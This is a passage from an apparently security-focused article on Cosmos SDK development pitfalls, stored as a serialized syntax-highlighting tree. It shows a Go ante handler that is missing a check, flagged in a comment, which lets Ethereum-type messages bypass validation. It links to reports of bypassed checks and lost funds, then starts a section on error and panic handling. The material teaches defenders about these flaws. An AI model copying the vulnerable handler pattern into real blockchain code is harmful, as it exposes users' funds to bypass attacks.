channelkeeper",{"type":27,"tag":207,"props":87169,"children":87170},{"style":238},[87171],{"type":33,"value":1041},{"type":27,"tag":207,"props":87173,"children":87174},{"style":8920},[87175],{"type":33,"value":87176},"Keeper",{"type":27,"tag":207,"props":87178,"children":87179},{"style":238},[87180],{"type":33,"value":1842},{"type":27,"tag":207,"props":87182,"children":87183},{"class":209,"line":892},[87184,87189,87194,87198,87202],{"type":27,"tag":207,"props":87185,"children":87186},{"style":220},[87187],{"type":33,"value":87188}," signModeHandler",{"type":27,"tag":207,"props":87190,"children":87191},{"style":8920},[87192],{"type":33,"value":87193}," authsigning",{"type":27,"tag":207,"props":87195,"children":87196},{"style":238},[87197],{"type":33,"value":1041},{"type":27,"tag":207,"props":87199,"children":87200},{"style":8920},[87201],{"type":33,"value":86870},{"type":27,"tag":207,"props":87203,"children":87204},{"style":238},[87205],{"type":33,"value":1842},{"type":27,"tag":207,"props":87207,"children":87208},{"class":209,"line":1475},[87209,87213,87217,87221,87225],{"type":27,"tag":207,"props":87210,"children":87211},{"style":238},[87212],{"type":33,"value":2222},{"type":27,"tag":207,"props":87214,"children":87215},{"style":8920},[87216],{"type":33,"value":85961},{"type":27,"tag":207,"props":87218,"children":87219},{"style":238},[87220],{"type":33,"value":1041},{"type":27,"tag":207,"props":87222,"children":87223},{"style":8920},[87224],{"type":33,"value":85701},{"type":27,"tag":207,"props":87226,"children":87227},{"style":238},[87228],{"type":33,"value":384},{"type":27,"tag":207,"props":87230,"children":87231},{"class":209,"line":2065},[87232,87236,87240],{"type":27,"tag":207,"props":87233,"children":87234},{"style":376},[87235],{"type":33,"value":8986},{"type":27,"tag":207,"props":87237,"children":87238},{"style":214},[87239],{"type":33,"value":2024},{"type":27,"tag":207,"props":87241,"children":87242},{"style":238},[87243],{"type":33,"value":9090},{"type":27,"tag":207,"props":87245,"children":87246},{"class":209,"line":2092},[87247,87251,87255,87259,87263,87267,87271,87275,87279,87283,87287,87292,87296],{"type":27,"tag":207,"props":87248,"children":87249},{"style":220},[87250],{"type":33,"value":33451},{"type":27,"tag":207,"props":87252,"children":87253},{"style":8920},[87254],{"type":33,"value":85872},{"type":27,"tag":207,"props":87256,"children":87257},{"style":238},[87258],{"type":33,"value":1041},{"type":27,"tag":207,"props":87260,"children":87261},{"style":8920},[87262],{"type":33,"value":83581},{"type":27,"tag":207,"props":87264,"children":87265},{"style":238},[87266],{"type":33,"value":1123},{"type":27,"tag":207,"props":87268,"children":87269},{"style":220},[87270],{"type":33,"value":86412},{"type":27,"tag":207,"props":87272,"children":87273},{"style":8920},[87274],{"type":33,"value":85872},{"type":27,"tag":207,"props":87276,"children":87277},{"style":238},[87278],{"type":33,"value":1041},{"type":27,"tag":207,"props":87280,"children":87281},{"style":8920},[87282],{"type":33,"value":85905},{"type":27,"tag":207,"props":87284,"children":87285},{"style":238},[87286],{"type":33,"value":1123},{"type":27,"tag":207,"props":87288,"children":87289},{"style":220},[87290],{"type":33,"value":87291},"sim",{"type":27,"tag":207,"props":87293,"children":87294},{"style":8920},[87295],{"type":33,"value":19327},{"type":27,"tag":207,"props":87297,"children":87298},{"style":238},[87299],{"type":33,"value":1842},{"type":27,"tag":207,"props":87301,"children":87302},{"class":209,"line":2130},[87303,87308,87313,87317,87321,87325,87329,87333,87337],{"type":27,"tag":207,"props":87304,"children":87305},{"style":238},[87306],{"type":33,"value":87307}," ) (",{"type":27,"tag":207,"props":87309,"children":87310},{"style":220},[87311],{"type":33,"value":87312},"newCtx",{"type":27,"tag":207,"props":87314,"children":87315},{"style":8920},[87316],{"type":33,"value":85872},{"type":27,"tag":207,"props":87318,"children":87319},{"style":238},[87320],{"type":33,"value":1041},{"type":27,"tag":207,"props":87322,"children":87323},{"style":8920},[87324],{"type":33,"value":83581},{"type":27,"tag":207,"props":87326,"children":87327},{"style":238},[87328],{"type":33,"value":1123},{"type":27,"tag":207,"props":87330,"children":87331},{"style":220},[87332],{"type":33,"value":55659},{"type":27,"tag":207,"props":87334,"children":87335},{"style":8920},[87336],{"type":33,"value":22151},{"type":27,"tag":207,"props":87338,"children":87339},{"style":238},[87340],{"type":33,"value":1424},{"type":27,"tag":207,"props":87342,"children":87343},{"class":209,"line":2168},[87344,87349,87354,87358,87362],{"type":27,"tag":207,"props":87345,"children":87346},{"style":214},[87347],{"type":33,"value":87348}," var",{"type":27,"tag":207,"props":87350,"children":87351},{"style":220},[87352],{"type":33,"value":87353}," anteHandler",{"type":27,"tag":207,"props":87355,"children":87356},{"style":8920},[87357],{"type":33,"value":85872},{"type":27,"tag":207,"props":87359,"children":87360},{"style":238},[87361],{"type":33,"value":1041},{"type":27,"tag":207,"props":87363,"children":87364},{"style":8920},[87365],{"type":33,"value":87366},"AnteHandler\n",{"type":27,"tag":207,"props":87368,"children":87369},{"class":209,"line":4095},[87370],{"type":27,"tag":207,"props":87371,"children":87372},{"emptyLinePlaceholder":19},[87373],{"type":33,"value":2062},{"type":27,"tag":207,"props":87375,"children":87376},{"class":209,"line":4103},[87377,87382,87387,87391,87395,87399,87404,87408,87412,87416],{"type":27,"tag":207,"props":87378,"children":87379},{"style":376},[87380],{"type":33,"value":87381}," defer",{"type":27,"tag":207,"props":87383,"children":87384},{"style":1335},[87385],{"type":33,"value":87386}," Recover",{"type":27,"tag":207,"props":87388,"children":87389},{"style":238},[87390],{"type":33,"value":1343},{"type":27,"tag":207,"props":87392,"children":87393},{"style":220},[87394],{"type":33,"value":27552},{"type":27,"tag":207,"props":87396,"children":87397},{"style":238},[87398],{"type":33,"value":1041},{"type":27,"tag":207,"props":87400,"children":87401},{"style":1335},[87402],{"type":33,"value":87403},"Logger",{"type":27,"tag":207,"props":87405,"children":87406},{"style":238},[87407],{"type":33,"value":25646},{"type":27,"tag":207,"props":87409,"children":87410},{"style":226},[87411],{"type":33,"value":10398},{"type":27,"tag":207,"props":87413,"children":87414},{"style":220},[87415],{"type":33,"value":55659},{"type":27,"tag":207,"props":87417,"children":87418},{"style":238},[87419],{"type":33,"value":10449},{"type":27,"tag":207,"props":87421,"children":87422},{"class":209,"line":4154},[87423],{"type":27,"tag":207,"props":87424,"children":87425},{"emptyLinePlaceholder":19},[87426],{"type":33,"value":2062},{"type":27,"tag":207,"props":87428,"children":87429},{"class":209,"line":4203},[87430,87435,87439,87443,87447,87451,87455,87460,87464,87469],{"type":27,"tag":207,"props":87431,"children":87432},{"style":220},[87433],{"type":33,"value":87434}," txWithExtensions",{"type":27,"tag":207,"props":87436,"children":87437},{"style":238},[87438],{"type":33,"value":1123},{"type":27,"tag":207,"props":87440,"children":87441},{"style":220},[87442],{"type":33,"value":85998},{"type":27,"tag":207,"props":87444,"children":87445},{"style":226},[87446],{"type":33,"value":83648},{"type":27,"tag":207,"props":87448,"children":87449},{"style":220},[87450],{"type":33,"value":75261},{"type":27,"tag":207,"props":87452,"children":87453},{"style":238},[87454],{"type":33,"value":86011},{"type":27,"tag":207,"props":87456,"children":87457},{"style":8920},[87458],{"type":33,"value":87459},"authante",{"type":27,"tag":207,"props":87461,"children":87462},{"style":238},[87463],{"type":33,"value":1041},{"type":27,"tag":207,"props":87465,"children":87466},{"style":8920},[87467],{"type":33,"value":87468},"HasExtensionOptionsTx",{"type":27,"tag":207,"props":87470,"children":87471},{"style":238},[87472],{"type":33,"value":10449},{"type":27,"tag":207,"props":87474,"children":87475},{"class":209,"line":4249},[87476,87480,87485],{"type":27,"tag":207,"props":87477,"children":87478},{"style":376},[87479],{"type":33,"value":10562},{"type":27,"tag":207,"props":87481,"children":87482},{"style":220},[87483],{"type":33,"value":87484}," ok",{"type":27,"tag":207,"props":87486,"children":87487},{"style":238},[87488],{"type":33,"value":384},{"type":27,"tag":207,"props":87490,"children":87491},{"class":209,"line":4290},[87492,87497,87501,87506,87510,87515],{"type":27,"tag":207,"props":87493,"children":87494},{"style":220},[87495],{"type":33,"value":87496}," opts",{"type":27,"tag":207,"props":87498,"children":87499},{"style":226},[87500],{"type":33,"value":83648},{"type":27,"tag":207,"props":87502,"children":87503},{"style":220},[87504],{"type":33,"value":87505}," txWithExtensions",{"type":27,"tag":207,"props":87507,"children":87508},{"style":238},[87509],{"type":33,"value":1041},{"type":27,"tag":207,"props":87511,"children":87512},{"style":1335},[87513],{"type":33,"value":87514},"GetExtensionOptions",{"type":27,"tag":207,"props":87516,"children":87517},{"style":238},[87518],{"type":33,"value":15018},{"type":27,"tag":207,"props":87520,"children":87521},{"class":209,"line":4304},[87522,87526,87530,87534,87538,87542,87546,87550],{"type":27,"tag":207,"props":87523,"children":87524},{"style":376},[87525],{"type":33,"value":66034},{"type":27,"tag":207,"props":87527,"children":87528},{"style":1335},[87529],{"type":33,"value":15838},{"type":27,"tag":207,"props":87531,"children":87532},{"style":238},[87533],{"type":33,"value":1343},{"type":27,"tag":207,"props":87535,"children":87536},{"style":220},[87537],{"type":33,"value":55801},{"type":27,"tag":207,"props":87539,"children":87540},{"style":238},[87541],{"type":33,"value":2222},{"type":27,"tag":207,"props":87543,"children":87544},{"style":226},[87545],{"type":33,"value":17739},{"type":27,"tag":207,"props":87547,"children":87548},{"style":232},[87549],{"type":33,"value":4680},{"type":27,"tag":207,"props":87551,"children":87552},{"style":238},[87553],{"type":33,"value":384},{"type":27,"tag":207,"props":87555,"children":87556},{"class":209,"line":5466},[87557,87562,87567,87571,87576,87580,87584,87588,87593,87597,87602],{"type":27,"tag":207,"props":87558,"children":87559},{"style":376},[87560],{"type":33,"value":87561}," switch",{"type":27,"tag":207,"props":87563,"children":87564},{"style":220},[87565],{"type":33,"value":87566}," typeURL",{"type":27,"tag":207,"props":87568,"children":87569},{"style":226},[87570],{"type":33,"value":83648},{"type":27,"tag":207,"props":87572,"children":87573},{"style":220},[87574],{"type":33,"value":87575}," opts",{"type":27,"tag":207,"props":87577,"children":87578},{"style":238},[87579],{"type":33,"value":11019},{"type":27,"tag":207,"props":87581,"children":87582},{"style":232},[87583],{"type":33,"value":1660},{"type":27,"tag":207,"props":87585,"children":87586},{"style":238},[87587],{"type":33,"value":57587},{"type":27,"tag":207,"props":87589,"children":87590},{"style":1335},[87591],{"type":33,"value":87592},"GetTypeUrl",{"type":27,"tag":207,"props":87594,"children":87595},{"style":238},[87596],{"type":33,"value":35714},{"type":27,"tag":207,"props":87598,"children":87599},{"style":220},[87600],{"type":33,"value":87601},"typeURL",{"type":27,"tag":207,"props":87603,"children":87604},{"style":238},[87605],{"type":33,"value":384},{"type":27,"tag":207,"props":87607,"children":87608},{"class":209,"line":5530},[87609,87614,87619],{"type":27,"tag":207,"props":87610,"children":87611},{"style":376},[87612],{"type":33,"value":87613}," case",{"type":27,"tag":207,"props":87615,"children":87616},{"style":1325},[87617],{"type":33,"value":87618}," \"/ethermint.evm.v1.ExtensionOptionsEthereumTx\"",{"type":27,"tag":207,"props":87620,"children":87621},{"style":238},[87622],{"type":33,"value":12851},{"type":27,"tag":207,"props":87624,"children":87625},{"class":209,"line":7900},[87626],{"type":27,"tag":207,"props":87627,"children":87628},{"style":4647},[87629],{"type":33,"value":87630}," // handle as *evmtypes.MsgEthereumTx\n",{"type":27,"tag":207,"props":87632,"children":87633},{"class":209,"line":7909},[87634],{"type":27,"tag":207,"props":87635,"children":87636},{"emptyLinePlaceholder":19},[87637],{"type":33,"value":2062},{"type":27,"tag":207,"props":87639,"children":87640},{"class":209,"line":7917},[87641,87646,87650,87654,87658,87663],{"type":27,"tag":207,"props":87642,"children":87643},{"style":220},[87644],{"type":33,"value":87645}," anteHandler",{"type":27,"tag":207,"props":87647,"children":87648},{"style":226},[87649],{"type":33,"value":229},{"type":27,"tag":207,"props":87651,"children":87652},{"style":220},[87653],{"type":33,"value":85872},{"type":27,"tag":207,"props":87655,"children":87656},{"style":238},[87657],{"type":33,"value":1041},{"type":27,"tag":207,"props":87659,"children":87660},{"style":1335},[87661],{"type":33,"value":87662},"ChainAnteDecorators",{"type":27,"tag":207,"props":87664,"children":87665},{"style":238},[87666],{"type":33,"value":9090},{"type":27,"tag":207,"props":87668,"children":87669},{"class":209,"line":7926},[87670,87675,87679],{"type":27,"tag":207,"props":87671,"children":87672},{"style":1335},[87673],{"type":33,"value":87674}," NewEthSetUpContextDecorator",{"type":27,"tag":207,"props":87676,"children":87677},{"style":238},[87678],{"type":33,"value":25646},{"type":27,"tag":207,"props":87680,"children":87681},{"style":4647},[87682],{"type":33,"value":86526},{"type":27,"tag":207,"props":87684,"children":87685},{"class":209,"line":7934},[87686],{"type":27,"tag":207,"props":87687,"children":87688},{"style":226},[87689],{"type":33,"value":87690}," ...\n",{"type":27,"tag":207,"props":87692,"children":87693},{"class":209,"line":7943},[87694,87699,87703,87708,87712],{"type":27,"tag":207,"props":87695,"children":87696},{"style":1335},[87697],{"type":33,"value":87698}," NewEthIncrementSenderSequenceDecorator",{"type":27,"tag":207,"props":87700,"children":87701},{"style":238},[87702],{"type":33,"value":1343},{"type":27,"tag":207,"props":87704,"children":87705},{"style":220},[87706],{"type":33,"value":87707},"ak",{"type":27,"tag":207,"props":87709,"children":87710},{"style":238},[87711],{"type":33,"value":22452},{"type":27,"tag":207,"props":87713,"children":87714},{"style":4647},[87715],{"type":33,"value":87716},"// innermost AnteDecorator.\n",{"type":27,"tag":207,"props":87718,"children":87719},{"class":209,"line":7952},[87720],{"type":27,"tag":207,"props":87721,"children":87722},{"style":238},[87723],{"type":33,"value":87724}," )\n",{"type":27,"tag":207,"props":87726,"children":87727},{"class":209,"line":7961},[87728],{"type":27,"tag":207,"props":87729,"children":87730},{"emptyLinePlaceholder":19},[87731],{"type":33,"value":2062},{"type":27,"tag":207,"props":87733,"children":87734},{"class":209,"line":7969},[87735,87740],{"type":27,"tag":207,"props":87736,"children":87737},{"style":376},[87738],{"type":33,"value":87739}," default",{"type":27,"tag":207,"props":87741,"children":87742},{"style":238},[87743],{"type":33,"value":12851},{"type":27,"tag":207,"props":87745,"children":87746},{"class":209,"line":7978},[87747,87752,87756,87760,87765,87769,87774],{"type":27,"tag":207,"props":87748,"children":87749},{"style":376},[87750],{"type":33,"value":87751}," return",{"type":27,"tag":207,"props":87753,"children":87754},{"style":220},[87755],{"type":33,"value":33108},{"type":27,"tag":207,"props":87757,"children":87758},{"style":238},[87759],{"type":33,"value":1123},{"type":27,"tag":207,"props":87761,"children":87762},{"style":220},[87763],{"type":33,"value":87764},"stacktrace",{"type":27,"tag":207,"props":87766,"children":87767},{"style":238},[87768],{"type":33,"value":1041},{"type":27,"tag":207,"props":87770,"children":87771},{"style":1335},[87772],{"type":33,"value":87773},"Propagate",{"type":27,"tag":207,"props":87775,"children":87776},{"style":238},[87777],{"type":33,"value":9090},{"type":27,"tag":207,"props":87779,"children":87780},{"class":209,"line":7987},[87781,87786,87790,87794,87798,87803,87807,87812,87816,87820],{"type":27,"tag":207,"props":87782,"children":87783},{"style":220},[87784],{"type":33,"value":87785}," sdkerrors",{"type":27,"tag":207,"props":87787,"children":87788},{"style":238},[87789],{"type":33,"value":1041},{"type":27,"tag":207,"props":87791,"children":87792},{"style":1335},[87793],{"type":33,"value":86077},{"type":27,"tag":207,"props":87795,"children":87796},{"style":238},[87797],{"type":33,"value":1343},{"type":27,"tag":207,"props":87799,"children":87800},{"style":220},[87801],{"type":33,"value":87802},"sdkerrors",{"type":27,"tag":207,"props":87804,"children":87805},{"style":238},[87806],{"type":33,"value":1041},{"type":27,"tag":207,"props":87808,"children":87809},{"style":220},[87810],{"type":33,"value":87811},"ErrUnknownExtensionOptions",{"type":27,"tag":207,"props":87813,"children":87814},{"style":238},[87815],{"type":33,"value":1123},{"type":27,"tag":207,"props":87817,"children":87818},{"style":220},[87819],{"type":33,"value":87601},{"type":27,"tag":207,"props":87821,"children":87822},{"style":238},[87823],{"type":33,"value":14018},{"type":27,"tag":207,"props":87825,"children":87826},{"class":209,"line":7996},[87827,87832],{"type":27,"tag":207,"props":87828,"children":87829},{"style":1325},[87830],{"type":33,"value":87831}," \"rejecting tx with unsupported extension option\"",{"type":27,"tag":207,"props":87833,"children":87834},{"style":238},[87835],{"type":33,"value":1842},{"type":27,"tag":207,"props":87837,"children":87838},{"class":209,"line":8005},[87839],{"type":27,"tag":207,"props":87840,"children":87841},{"style":238},[87842],{"type":33,"value":87724},{"type":27,"tag":207,"props":87844,"children":87845},{"class":209,"line":8013},[87846],{"type":27,"tag":207,"props":87847,"children":87848},{"style":238},[87849],{"type":33,"value":78304},{"type":27,"tag":207,"props":87851,"children":87852},{"class":209,"line":8021},[87853],{"type":27,"tag":207,"props":87854,"children":87855},{"emptyLinePlaceholder":19},[87856],{"type":33,"value":2062},{"type":27,"tag":207,"props":87858,"children":87859},{"class":209,"line":8029},[87860,87864,87868,87872,87876,87880,87884,87888,87892],{"type":27,"tag":207,"props":87861,"children":87862},{"style":376},[87863],{"type":33,"value":67960},{"type":27,"tag":207,"props":87865,"children":87866},{"style":1335},[87867],{"type":33,"value":87353},{"type":27,"tag":207,"props":87869,"children":87870},{"style":238},[87871],{"type":33,"value":1343},{"type":27,"tag":207,"props":87873,"children":87874},{"style":220},[87875],{"type":33,"value":27552},{"type":27,"tag":207,"props":87877,"children":87878},{"style":238},[87879],{"type":33,"value":1123},{"type":27,"tag":207,"props":87881,"children":87882},{"style":220},[87883],{"type":33,"value":86412},{"type":27,"tag":207,"props":87885,"children":87886},{"style":238},[87887],{"type":33,"value":1123},{"type":27,"tag":207,"props":87889,"children":87890},{"style":220},[87891],{"type":33,"value":87291},{"type":27,"tag":207,"props":87893,"children":87894},{"style":238},[87895],{"type":33,"value":10449},{"type":27,"tag":207,"props":87897,"children":87898},{"class":209,"line":8037},[87899],{"type":27,"tag":207,"props":87900,"children":87901},{"style":238},[87902],{"type":33,"value":66118},{"type":27,"tag":207,"props":87904,"children":87905},{"class":209,"line":8046},[87906],{"type":27,"tag":207,"props":87907,"children":87908},{"style":238},[87909],{"type":33,"value":10637},{"type":27,"tag":207,"props":87911,"children":87912},{"class":209,"line":8055},[87913],{"type":27,"tag":207,"props":87914,"children":87915},{"emptyLinePlaceholder":19},[87916],{"type":33,"value":2062},{"type":27,"tag":207,"props":87918,"children":87919},{"class":209,"line":8064},[87920],{"type":27,"tag":207,"props":87921,"children":87922},{"style":4647},[87923],{"type":33,"value":87924}," // SHOULD CHECK TX IS NOT MsgEthereumTx HERE\n",{"type":27,"tag":207,"props":87926,"children":87927},{"class":209,"line":8072},[87928],{"type":27,"tag":207,"props":87929,"children":87930},{"emptyLinePlaceholder":19},[87931],{"type":33,"value":2062},{"type":27,"tag":207,"props":87933,"children":87934},{"class":209,"line":8081},[87935,87940,87944,87948,87952],{"type":27,"tag":207,"props":87936,"children":87937},{"style":376},[87938],{"type":33,"value":87939}," switch",{"type":27,"tag":207,"props":87941,"children":87942},{"style":220},[87943],{"type":33,"value":75261},{"type":27,"tag":207,"props":87945,"children":87946},{"style":238},[87947],{"type":33,"value":86011},{"type":27,"tag":207,"props":87949,"children":87950},{"style":214},[87951],{"type":33,"value":40014},{"type":27,"tag":207,"props":87953,"children":87954},{"style":238},[87955],{"type":33,"value":1424},{"type":27,"tag":207,"props":87957,"children":87958},{"class":209,"line":8090},[87959,87964,87968,87972,87976],{"type":27,"tag":207,"props":87960,"children":87961},{"style":376},[87962],{"type":33,"value":87963}," case",{"type":27,"tag":207,"props":87965,"children":87966},{"style":8920},[87967],{"type":33,"value":85872},{"type":27,"tag":207,"props":87969,"children":87970},{"style":238},[87971],{"type":33,"value":1041},{"type":27,"tag":207,"props":87973,"children":87974},{"style":8920},[87975],{"type":33,"value":85905},{"type":27,"tag":207,"props":87977,"children":87978},{"style":238},[87979],{"type":33,"value":12851},{"type":27,"tag":207,"props":87981,"children":87982},{"class":209,"line":8098},[87983,87988,87992,87996,88000,88004],{"type":27,"tag":207,"props":87984,"children":87985},{"style":220},[87986],{"type":33,"value":87987}," anteHandler",{"type":27,"tag":207,"props":87989,"children":87990},{"style":226},[87991],{"type":33,"value":229},{"type":27,"tag":207,"props":87993,"children":87994},{"style":220},[87995],{"type":33,"value":85872},{"type":27,"tag":207,"props":87997,"children":87998},{"style":238},[87999],{"type":33,"value":1041},{"type":27,"tag":207,"props":88001,"children":88002},{"style":1335},[88003],{"type":33,"value":87662},{"type":27,"tag":207,"props":88005,"children":88006},{"style":238},[88007],{"type":33,"value":9090},{"type":27,"tag":207,"props":88009,"children":88010},{"class":209,"line":8107},[88011,88016,88020,88025,88029],{"type":27,"tag":207,"props":88012,"children":88013},{"style":220},[88014],{"type":33,"value":88015}," authante",{"type":27,"tag":207,"props":88017,"children":88018},{"style":238},[88019],{"type":33,"value":1041},{"type":27,"tag":207,"props":88021,"children":88022},{"style":1335},[88023],{"type":33,"value":88024},"NewSetUpContextDecorator",{"type":27,"tag":207,"props":88026,"children":88027},{"style":238},[88028],{"type":33,"value":25646},{"type":27,"tag":207,"props":88030,"children":88031},{"style":4647},[88032],{"type":33,"value":86526},{"type":27,"tag":207,"props":88034,"children":88035},{"class":209,"line":8116},[88036],{"type":27,"tag":207,"props":88037,"children":88038},{"style":226},[88039],{"type":33,"value":88040}," ...\n",{"type":27,"tag":207,"props":88042,"children":88043},{"class":209,"line":8125},[88044,88048,88052,88057,88061,88065,88069],{"type":27,"tag":207,"props":88045,"children":88046},{"style":220},[88047],{"type":33,"value":88015},{"type":27,"tag":207,"props":88049,"children":88050},{"style":238},[88051],{"type":33,"value":1041},{"type":27,"tag":207,"props":88053,"children":88054},{"style":1335},[88055],{"type":33,"value":88056},"NewIncrementSequenceDecorator",{"type":27,"tag":207,"props":88058,"children":88059},{"style":238},[88060],{"type":33,"value":1343},{"type":27,"tag":207,"props":88062,"children":88063},{"style":220},[88064],{"type":33,"value":87707},{"type":27,"tag":207,"props":88066,"children":88067},{"style":238},[88068],{"type":33,"value":22452},{"type":27,"tag":207,"props":88070,"children":88071},{"style":4647},[88072],{"type":33,"value":88073},"// innermost AnteDecorator\n",{"type":27,"tag":207,"props":88075,"children":88076},{"class":209,"line":8133},[88077],{"type":27,"tag":207,"props":88078,"children":88079},{"style":238},[88080],{"type":33,"value":84746},{"type":27,"tag":207,"props":88082,"children":88083},{"class":209,"line":8142},[88084,88089],{"type":27,"tag":207,"props":88085,"children":88086},{"style":376},[88087],{"type":33,"value":88088}," default",{"type":27,"tag":207,"props":88090,"children":88091},{"style":238},[88092],{"type":33,"value":12851},{"type":27,"tag":207,"props":88094,"children":88095},{"class":209,"line":8151},[88096,88100,88104,88108,88112,88116,88120],{"type":27,"tag":207,"props":88097,"children":88098},{"style":376},[88099],{"type":33,"value":86307},{"type":27,"tag":207,"props":88101,"children":88102},{"style":220},[88103],{"type":33,"value":33108},{"type":27,"tag":207,"props":88105,"children":88106},{"style":238},[88107],{"type":33,"value":1123},{"type":27,"tag":207,"props":88109,"children":88110},{"style":220},[88111],{"type":33,"value":87764},{"type":27,"tag":207,"props":88113,"children":88114},{"style":238},[88115],{"type":33,"value":1041},{"type":27,"tag":207,"props":88117,"children":88118},{"style":1335},[88119],{"type":33,"value":87773},{"type":27,"tag":207,"props":88121,"children":88122},{"style":238},[88123],{"type":33,"value":9090},{"type":27,"tag":207,"props":88125,"children":88126},{"class":209,"line":8160},[88127,88132,88136,88141,88145,88149,88153,88158,88162,88167,88171,88175],{"type":27,"tag":207,"props":88128,"children":88129},{"style":220},[88130],{"type":33,"value":88131}," sdkerrors",{"type":27,"tag":207,"props":88133,"children":88134},{"style":238},[88135],{"type":33,"value":1041},{"type":27,"tag":207,"props":88137,"children":88138},{"style":1335},[88139],{"type":33,"value":88140},"Wrapf",{"type":27,"tag":207,"props":88142,"children":88143},{"style":238},[88144],{"type":33,"value":1343},{"type":27,"tag":207,"props":88146,"children":88147},{"style":220},[88148],{"type":33,"value":87802},{"type":27,"tag":207,"props":88150,"children":88151},{"style":238},[88152],{"type":33,"value":1041},{"type":27,"tag":207,"props":88154,"children":88155},{"style":220},[88156],{"type":33,"value":88157},"ErrUnknownRequest",{"type":27,"tag":207,"props":88159,"children":88160},{"style":238},[88161],{"type":33,"value":1123},{"type":27,"tag":207,"props":88163,"children":88164},{"style":1325},[88165],{"type":33,"value":88166},"\"invalid transaction type: %T\"",{"type":27,"tag":207,"props":88168,"children":88169},{"style":238},[88170],{"type":33,"value":1123},{"type":27,"tag":207,"props":88172,"children":88173},{"style":220},[88174],{"type":33,"value":86412},{"type":27,"tag":207,"props":88176,"children":88177},{"style":238},[88178],{"type":33,"value":14018},{"type":27,"tag":207,"props":88180,"children":88181},{"class":209,"line":8169},[88182,88187],{"type":27,"tag":207,"props":88183,"children":88184},{"style":1325},[88185],{"type":33,"value":88186}," \"transaction is not an SDK tx\"",{"type":27,"tag":207,"props":88188,"children":88189},{"style":238},[88190],{"type":33,"value":1842},{"type":27,"tag":207,"props":88192,"children":88193},{"class":209,"line":8177},[88194],{"type":27,"tag":207,"props":88195,"children":88196},{"style":238},[88197],{"type":33,"value":84746},{"type":27,"tag":207,"props":88199,"children":88200},{"class":209,"line":8185},[88201],{"type":27,"tag":207,"props":88202,"children":88203},{"style":238},[88204],{"type":33,"value":10637},{"type":27,"tag":207,"props":88206,"children":88207},{"class":209,"line":8194},[88208],{"type":27,"tag":207,"props":88209,"children":88210},{"emptyLinePlaceholder":19},[88211],{"type":33,"value":2062},{"type":27,"tag":207,"props":88213,"children":88214},{"class":209,"line":9933},[88215,88219,88223,88227,88231,88235,88239,88243,88247],{"type":27,"tag":207,"props":88216,"children":88217},{"style":376},[88218],{"type":33,"value":23019},{"type":27,"tag":207,"props":88220,"children":88221},{"style":1335},[88222],{"type":33,"value":87353},{"type":27,"tag":207,"props":88224,"children":88225},{"style":238},[88226],{"type":33,"value":1343},{"type":27,"tag":207,"props":88228,"children":88229},{"style":220},[88230],{"type":33,"value":27552},{"type":27,"tag":207,"props":88232,"children":88233},{"style":238},[88234],{"type":33,"value":1123},{"type":27,"tag":207,"props":88236,"children":88237},{"style":220},[88238],{"type":33,"value":86412},{"type":27,"tag":207,"props":88240,"children":88241},{"style":238},[88242],{"type":33,"value":1123},{"type":27,"tag":207,"props":88244,"children":88245},{"style":220},[88246],{"type":33,"value":87291},{"type":27,"tag":207,"props":88248,"children":88249},{"style":238},[88250],{"type":33,"value":10449},{"type":27,"tag":207,"props":88252,"children":88253},{"class":209,"line":9941},[88254],{"type":27,"tag":207,"props":88255,"children":88256},{"style":238},[88257],{"type":33,"value":10645},{"type":27,"tag":207,"props":88259,"children":88260},{"class":209,"line":9950},[88261],{"type":27,"tag":207,"props":88262,"children":88263},{"style":238},[88264],{"type":33,"value":451},{"type":27,"tag":36,"props":88266,"children":88267},{},[88268,88270,88275,88277,88284,88285,88292],{"type":33,"value":88269},"Additional examples of incorrect ",{"type":27,"tag":84,"props":88271,"children":88273},{"className":88272},[],[88274],{"type":33,"value":85701},{"type":33,"value":88276}," usage include ",{"type":27,"tag":47,"props":88278,"children":88281},{"href":88279,"rel":88280},"https://jumpcrypto.com/writing/bypassing-ethermint-ante-handlers",[51],[88282],{"type":33,"value":88283},"yet more bypassable checks and loss of funds",{"type":33,"value":1131},{"type":27,"tag":47,"props":88286,"children":88289},{"href":88287,"rel":88288},"https://github.com/cosmos/ibc-go/issues/853",[51],[88290],{"type":33,"value":88291},"incorrect data passing between blockchains",{"type":33,"value":1041},{"type":27,"tag":28,"props":88294,"children":88296},{"id":88295},"errors-panics-i-can-handle-it",[88297],{"type":33,"value":88298},"Errors? Panics? I can handle it",{"type":27,"tag":36,"props":88300,"children":88301},{},[88302],{"type":33,"value":88303},"Smart contract developers are used to not properly handling errors. This is acceptable since most underlying blockchains revert all state changes when execution fails.",{"type":27,"tag":36,"props":88305,"children":88306},{},[88307],{"type":33,"value":88308},"Cosmos is designed to provide a similar experience. Whenever some message handler returns an error, changes to the persistent state are dropped. Panics are handled similarly, where a recovery handler is wrapped around the message execution to convert panics into errors for a downstream process.",{"type":27,"tag":36,"props":88310,"children":88311},{},[88312,88314,88320,88322,88327],{"type":33,"value":88313},"This design is pretty neat and allows developers to write code in a rather lazy way. For instance, the following code works perfectly fine. If ",{"type":27,"tag":84,"props":88315,"children":88317},{"className":88316},[],[88318],{"type":33,"value":88319},"k.keeper.TotalReward()",{"type":33,"value":88321}," returns zero, the ",{"type":27,"tag":84,"props":88323,"children":88325},{"className":88324},[],[88326],{"type":33,"value":65179},{"type":33,"value":88328}," execution will simply rollback as if nothing has happened.",{"type":27,"tag":101,"props":88330,"children":88332},{"code":88331,"language":83397,"meta":7,"className":83398,"style":7},"func (k msgServer) AllocateReward(\n goCtx context.Context,\n msg *types.MsgAllocateReward)\n(*types.MsgAllocatRewardResponse, error) {\n\n RewardPerShare := k.keeper.Shares() / k.keeper.TotalReward()\n k.keeper.DistributeReward(RewardPerShare)\n\n return &types.MsgAllocateRewardResponse, nil\n}\n",[88333],{"type":27,"tag":84,"props":88334,"children":88335},{"__ignoreMap":7},[88336,88369,88392,88420,88456,88463,88532,88570,88577,88609],{"type":27,"tag":207,"props":88337,"children":88338},{"class":209,"line":210},[88339,88343,88347,88352,88356,88360,88365],{"type":27,"tag":207,"props":88340,"children":88341},{"style":214},[88342],{"type":33,"value":2085},{"type":27,"tag":207,"props":88344,"children":88345},{"style":238},[88346],{"type":33,"value":686},{"type":27,"tag":207,"props":88348,"children":88349},{"style":220},[88350],{"type":33,"value":88351},"k 